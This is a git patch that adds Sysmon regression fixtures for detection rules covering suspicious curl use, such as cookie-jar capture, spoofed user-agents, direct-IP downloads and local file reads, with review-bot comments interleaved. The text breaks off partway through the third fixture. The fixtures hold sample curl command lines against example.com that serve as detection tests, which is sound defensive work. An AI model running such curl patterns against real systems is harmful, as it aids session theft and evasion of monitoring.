From c8b1a0ff67b77718d7030278d8e955f621df9b6b Mon Sep 17 00:00:00 2001 
From: Swachchhanda Shrawan Poudel <87493836+swachchhanda000@users.noreply.github.com> Date: Thu, 25 Dec 2025 20:50:48 +0545 Subject: [PATCH] Merge PR #5805 from @swachchhanda000 - Add regression tests for curl-related rules update: Curl Web Request With Potential Custom User-Agent - add another curl supported flag for header chore: add regression tests for curl-related rules --- .../5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx | Bin 0 -> 69632 bytes .../5a6e1e16-07de-48d8-8aae-faa766c05e88.json | 66 ++++++++++++++++++ .../info.yml | 13 ++++ .../85de1f22-d189-44e4-8239-dc276b45379b.evtx | Bin 0 -> 69632 bytes .../85de1f22-d189-44e4-8239-dc276b45379b.json | 66 ++++++++++++++++++ .../info.yml | 13 ++++ .../9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx | Bin 0 -> 69632 bytes .../9cc85849-3b02-4cb5-b371-3a1ff54f2218.json | 66 ++++++++++++++++++ .../info.yml | 13 ++++ .../5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx | Bin 0 -> 69632 bytes .../5cb299fc-5fb1-4d07-b989-0644c68b6043.json | 66 ++++++++++++++++++ .../info.yml | 13 ++++ .../56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx | Bin 0 -> 69632 bytes .../56454143-524f-49fb-b1c6-3fb8b1ad41fb.json | 66 ++++++++++++++++++ .../info.yml | 13 ++++ .../cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx | Bin 0 -> 69632 bytes .../cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json | 66 ++++++++++++++++++ .../info.yml | 13 ++++ .../2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx | Bin 0 -> 69632 bytes .../2c1486f5-02e8-4f86-9099-b97f2da4ed77.json | 66 ++++++++++++++++++ .../info.yml | 13 ++++ .../aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx | Bin 0 -> 69632 bytes .../aa6f6ea6-0676-40dd-b510-6e46f02d8867.json | 66 ++++++++++++++++++ .../info.yml | 13 ++++ ...roc_creation_win_curl_cookie_hijacking.yml | 1 + ...oc_creation_win_curl_custom_user_agent.yml | 11 ++- ...ation_win_curl_download_direct_ip_exec.yml | 1 + ...url_download_direct_ip_susp_extensions.yml | 1 + ...url_download_susp_file_sharing_domains.yml | 1 + ..._creation_win_curl_insecure_connection.yml | 1 + 
...eation_win_curl_insecure_proxy_or_doh.yml} | 1 + ...proc_creation_win_curl_local_file_read.yml | 1 + 32 files changed, 648 insertions(+), 2 deletions(-) create mode 100755 regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.json create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml create mode 100755 regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.evtx create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.json create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.json create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml create mode 100755 regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.json create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml create mode 100755 
regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.json create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml create mode 100755 regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml create mode 100755 regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.json create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml create mode 100755 regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.evtx create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/aa6f6ea6-0676-40dd-b510-6e46f02d8867.json create mode 100644 regression_data/rules/windows/process_creation/proc_creation_win_curl_local_file_read/info.yml rename rules/windows/process_creation/{proc_creation_win_curl_insecure_porxy_or_doh.yml => proc_creation_win_curl_insecure_proxy_or_doh.yml} (85%) 
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx new file mode 100755 index 0000000000000000000000000000000000000000..e5eb3a054efc34fcb0d6eb21e4281dc171f9e00c GIT binary patch literal 69632 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 F{1^6BT7dun literal 0 HcmV?d00001 diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.json new file mode 100644 index 000000000..af8f74405 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.json 
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-12-11T06:22:12.568940Z"
+ }
+ },
+ "EventRecordID": 21497,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3208,
+ "ThreadID": 1724
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "swachchhanda",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-12-11 06:22:12.498",
+ "ProcessGuid": "0197231E-6314-693A-D112-000000000800",
+ "ProcessId": 11000,
+ "Image": "C:\\Windows\\System32\\curl.exe",
+ "FileVersion": "8.10.1",
+ "Description": "The curl executable",
+ "Product": "The curl executable",
+ "Company": "curl, https://curl.se/",
+ "OriginalFileName": "curl.exe",
+ "CommandLine": "curl.exe --cookie-jar cookie \"http://example.com\"",
+ "CurrentDirectory": "C:\\Users\\xodih\\Downloads\\Sysmon\\",
+ "User": "swachchhanda\\xodih",
+ "LogonGuid": "0197231E-AB9F-67AA-4C14-030000000000",
+ "LogonId": "0x3144c",
+ "TerminalSessionId": 1,
+ "IntegrityLevel": "High",
+ "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+ "ParentProcessGuid": "0197231E-BDEA-6937-AB0C-000000000800",
+ "ParentProcessId": 3476,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+ "ParentUser": "swachchhanda\\xodih"
+ }
+ }
+}
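Review bot: The `Computer`, `User`, `ParentUser` and `CurrentDirectory` fields of this fixture carry the recording workstation's real hostname and account (`swachchhanda`, `xodih`), and the same values recur in the JSON hunks for custom_user_agent, download_direct_ip_exec, download_direct_ip_susp_extensions and download_susp_file_sharing_domains. If the project has a convention for sanitising published fixtures, this series is where it would apply; the JSON presumably mirrors the accompanying .evtx, so any neutral host and user names would have to go into the recording itself rather than this file alone. The rule under test appears to key on the curl command line only, so such a change should not alter the expected match, but I cannot confirm that from this hunk.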
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml
new file mode 100644
index 000000000..c5dda047b
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml
@@ -0,0 +1,13 @@
+id: d7f159c3-db76-4e39-b677-c0958f5f82b8
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+ - id: 5a6e1e16-07de-48d8-8aae-faa766c05e88
+ title: Potential Cookies Session Hijacking
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx
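Review bot: `description: N/A` leaves the test metadata without any statement of what the recording exercises, and `regression_tests_info` contains only a `Positive Detection Test`; the same applies to the info.yml hunks for custom_user_agent, download_direct_ip_exec, download_direct_ip_susp_extensions and download_susp_file_sharing_domains. A one-line entry such as `description: curl.exe invoked with --cookie-jar against an HTTP URL; one Sysmon EventID 1 record expected to match` would tell a later maintainer what the .evtx holds without opening it. A second recording of an ordinary curl invocation without the cookie-persistence switch, listed with `match_count: 0`, would also catch the rule becoming over-broad, which a positive-only test cannot detect. Whether the harness accepts zero-match entries I cannot tell from this hunk.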
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.evtx new file mode 100755 index 0000000000000000000000000000000000000000..67be7e022fe96077efb1a305db48dabbcb0aabdc GIT binary patch literal 69632 zcmeI0TWnlc6^7S2o*9qFo*BE1xi-N`FEk;(dwj`-V$XO;s7*uDk|J5EOgwfb9gnTp zxe*CPKn3kX0SUxIABuQ^wg~Zp1XTeE3Bgm4P$e!xRZ)4MJb(&RfGTAEf1k5Gwy_hJ zzVPs$(V4T)-fOSD_P5qvd(TYP=F8Pu#kO8yTyY)G(3;HJgRLTO`+fXhZ+`G?E0F>b z5CIVo0TB=Z5fA|p5CIVo0TB>^TN0S8%@@zrA2a{!ey8VkYQmoaT^(kB|G{e)ZmIYd z0vzX=C%^lLjbeLKW|_3v-;!p3Ol)j18$kVW{0;F|uN$}M^907^wHIUZ`bRAP?YN$G zPor*ri#_+@{h#rlB=6ZW#$v3CeV>iX(~vDg=L=i(P-eH+tIZ9`d;A|XjjI2tbm$O# znzwcTXV3QDsGR>@kPiZD3tm3@=WqFuSibkQryo4<`(M9w{n?IhehD+7)Od$|4nGd+jpX>Ua)VA3j4U_1P%CE9=9rYXA4e z4t6H&!*9;R0$(+Ff|@E9d+#(sn&rG?|t}_KIbPwJ z*E2Q_jjJ%6(Xxt}MtXD2mQOJ$(Cvkvb{L0_G;vNlbjmVZ*47p=hEF2j|6U6waK#yZ z(G3*2_XO>LH;uMre$^7k>{$q|;1gSswseZAm9Bk!EDgfvVzwSYuEo+#LAwhlCSzWo zMTiz5Ig3E5JG<$$b_){0+S)M)FsspVN9$<^Y7wD8X+!_Vz`84jZqeE3Tgx$E*OeTD(%lXuCf zokczK;uxOXg&Aj0E+vqwI4E1+jXTABm<-a0?TfIWvYr#eEL=iI-yQdVXG6Lfu3QB% zzih)SETU|8EbCk!X>Q#T)IPC>+0gRrb1?4n-iH4FUI=p*W}7Tc`Temxy&qejL`ZSt zS%Cdv7GbobEoIQ=EH@|GFq^zdpAzJ`y)m+v*Zmb{Q#augZ9a2g%ES_8n{Oh^EXBpg zm3kGj=}2}Yo+tUl^K3`l(251zb;#Gu&&Tg%VYcNaGl@nbDMt2`(?VicP$ahPh())i znL~LlD4`F_oE1|r?QM;E)8~vcuGZMz#QKsCvu%;ow%(qCt_8QU8qt9?N}INgzJ~ls z%p=U^qOHhB`Ue^obRb5#&UhS&h%rwwxkjrl>YtAyYcQSx$Bbu?Lu7H@71-x9TVwAH zv&^Tk^3J$tXQO8d35iD`9*S0AV@D*pt&OK3=?O=XloklAxj}^94 z|7d=hcB zD9VT*yC=R6yS4zH3G73-?{e?(BDRZYiwNuxvLv?!z7M1QSS;7=j-3NmKu+&Rncw}^ zg(K)NjM6s3NQ#Bc866^!d;x?&l=Gd+LO<*D6Cc^!wL&mYTI;)A(w>p>J&aI9{;M>cJJ z?}CnQ#BLW(6W%x7IO{OCawQx=3%45P(MIio4I@WC2&kQ>>t#0&fB28cdA%!ObOq~v z4%*J4TtfLWMycUBi(0lv2mNT@ok7j^Cz6eN=&@&>e{NxF54JX3{u!Wr0wXP8tZ9r@ zu;ciiz-Iu@J{!Yba?vq{h-2*p>c${f#!ML>BPf+H`!d=G(NeaS>m)w>9)bowOK4@J^uY%97(ji|y$_;o 
z1TsTTrhv8~v`*lA3_T7bUrl3u(I#4U9ButhW(eOCu%ZAh;}~<;&4JH;j4*-PBF5y1 z(R0X2^t<@~(+@|g&*K2a`2Pyd1-p;`MR?Ii|AF;>CvnOsVJ|xa8|l-=PdUGCHuvk= zmEUQfyZF0Umk5Y}2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0P zh=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%) zfCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y z2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0P zh=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%) zfCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y z2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2#A0Ph=2%)fCz|y2>jm? z$Xdeo#5c=X3oWo$aNmo2&X(-5tys5>+cG|nSjj4Q)=+=d7E!L-s-4F3f?aaoz4idw V`96!5D&*=Y)vPVJ`$vTi`wyusZms|T literal 0 HcmV?d00001 diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.json new file mode 100644 index 000000000..aea2fe730 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.json 
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-12-11T06:17:19.772545Z"
+ }
+ },
+ "EventRecordID": 21475,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3208,
+ "ThreadID": 1724
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "swachchhanda",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-12-11 06:17:19.636",
+ "ProcessGuid": "0197231E-61EF-693A-C812-000000000800",
+ "ProcessId": 6400,
+ "Image": "C:\\Windows\\System32\\curl.exe",
+ "FileVersion": "8.10.1",
+ "Description": "The curl executable",
+ "Product": "The curl executable",
+ "Company": "curl, https://curl.se/",
+ "OriginalFileName": "curl.exe",
+ "CommandLine": "curl.exe -H \"User-Agent: EvilAgent\" http://example.com",
+ "CurrentDirectory": "C:\\Users\\xodih\\Downloads\\Sysmon\\",
+ "User": "swachchhanda\\xodih",
+ "LogonGuid": "0197231E-AB9F-67AA-4C14-030000000000",
+ "LogonId": "0x3144c",
+ "TerminalSessionId": 1,
+ "IntegrityLevel": "High",
+ "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+ "ParentProcessGuid": "0197231E-BDEA-6937-AB0C-000000000800",
+ "ParentProcessId": 3476,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+ "ParentUser": "swachchhanda\\xodih"
+ }
+ }
+}
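Review bot: This recording only exercises the header form the commit adds, `-H "User-Agent: EvilAgent"` in `CommandLine`, so the rule's pre-existing user-agent branch, which the commit message says was already there, gets no regression coverage from this series. A second event in the same .evtx using curl's existing `-A`/`--user-agent` switch, with `match_count: 2` in the accompanying info.yml, would pin both branches and would catch a later edit that breaks the original one while the new one still matches. I am inferring the rule's structure from the commit message ("add another curl supported flag for header"); the rule file itself is not in this chunk.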
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml
new file mode 100644
index 000000000..f8c2ccdc5
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml
@@ -0,0 +1,13 @@
+id: 6428e458-fe2e-4936-accb-aebd0bcc8e35
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+ - id: 85de1f22-d189-44e4-8239-dc276b45379b
+ title: Curl Web Request With Potential Custom User-Agent
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.evtx
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx new file mode 100644 index 0000000000000000000000000000000000000000..fd2796fb2c69bd09a48040a955e25286919b807c GIT binary patch literal 69632 zcmeI0TWnlc6^7S2bMbiWnX%iNLTN%S5SkD>zKw5bK;yB8gxC;DLkhA~nRpyK8P8a? z-6ljr5l}%ZLCXW`Lm!Iz0xgI)Bve&GLIU23geq}SRe^Ycmr4bNiy~zHf1k5GwreLY zedIr*GiP7cUVH6tt-bb{nXJuM7Hd`8euZ(v4Ln0jm~{l(Mc#A0^zU0Af6q#!KmYKmJ@Deyq2*&C<-ao-&k-$8)$ zy!Fc$zqMIxU)n62G5dSU>@Ug9J!buAKZU;`-tG0;9mYI`IeG2FoV@-S%l{~DXWR2= zo8M;7Cs6-a{3pqM+vZq`b#d%Vad{fD73h3rn;y#S_4;#5Q}T%agQnT^Kb4LhgHH># z;s4n$E*!31ej_LZfwc#3o_y;EekPV5`0Miz9s1MnUcd2D=l7q*N+?z8w6CMc1@d~O zJ!O;jxK*ugtEhhiclvVN`D!6$S8d5^=v+ZZDk$0l#8z$D#_R+>D|QhrRmjYu+=J&L zS{}0oY7Lu*WDn{Mw4bmi&{xN^-+J*GM5)(C@Lk=Qeq~E74A$3Qhp)Wf8V{%Kb9N1y zSKW*V@Y4GF7hsq7=-bybcFxWIIOdvz)MMx!!d>yfc=o$V`!tMQLZ?|iZ$bKzI3A96 zCGC^8=0>8cV1+~}Vbc)%ax8Ikwq+BnGd6*~kK#@<; zq@}}r!qUm0%?_c#NBa9)TkP|(*dj>P(HG|1ESbcf+mDJ5@wwMhHU&ZYs^)}@LZRJ{ z%KdSiPF_#i!_F61oJhzC13Q2Uw*apn?@!xj;6S>Ch&Ww9O)2{@Dt_l&{&mLAqWc>B z)&R#jaHnX>x{|BqAT?vzDbTPhyZy2rvGv&B{)UcGR3D9_tL`DwTMLXW!0R z2^v>nIHP41D~dtODt;2$3u)h8v1en$6xRdpa1GR)upmEV&2~$BkOn3t0xv_aiy5`VA*5gp& zlkoR?GH@r|vIff{gk~RtMB3-$`Kh#>heB$P*VS%!CzAP2JD9Y)Ad1j)HzE}WR!6bm2;(#5-eICx_v#y%)6(E7)l~&$b?PTKs8fH+)|FX1m#|P}*|d4MGNsWKx`Z z8a8iDR^4_1ZFP9L0R}799f#`@>UDc`Wck9epZ~G^v#IpW#b<8){@sp0;r1O-aDPNm z$xIO?@2{L$9q~s7%WW4=J{o-LsbBr){LA;e35QV%KKu=eJau_Ze3b#_llO#EJBxPa z#Zf$Y3Ny~0ZX}VbI4OHSfIH26mw<+BMSFVDX-?m{6 z7E!i4mUXU=G`DRFYM)rcTxbQ3IU0}oU{n7)H^Q8SxrAjXe=wG(_hai*2q_*smtcRG zLm2I9O9iyK%B_hu%%yHKW&-j&-Wb`-8~zG&>D%y$4xc$NWnu|)Ew_Kxx-Pk$)r=0LQQEX)^fl$rU>#vD zA00(L(m&R;pc665ea6?3h#2z}lWVl=qVa_&vIgQ6aL#xIc|;c1U4?xwBt79Ma{Lj{cJ^BlIlT{Me)rh{yn+rx zrWY+^HejQee;Dl}w*T;R!85h7#Ut*t$=D;4hU0R~X11LWGh1G02B2pKyM*Uq4Z5oC 
z^dCW~4|DLFr+5|fdYJ>U4C_qKUvhbBZ&F^zap?1}U-LQOfWbx?^^32$?$Y*=s4ND;I_rjr#acA((F@clq0&JvT zn?LOQF4{V7FP^7$?)R}P=t~4dKmYKmYKmYKmYKmYKmYKmY zKmYKmYKmYKmYKmYKmYKmYKmYKmYKmYKmYKmYKmY zKmYKmYKmYKmYKmYKmYKmYKmYKmYKm`7e3H%ovPF?l@ literal 0 HcmV?d00001 diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.json new file mode 100644 index 000000000..b33823434 --- /dev/null +++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.json 
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-12-11T07:02:39.732592Z"
+ }
+ },
+ "EventRecordID": 21767,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3208,
+ "ThreadID": 1724
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "swachchhanda",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
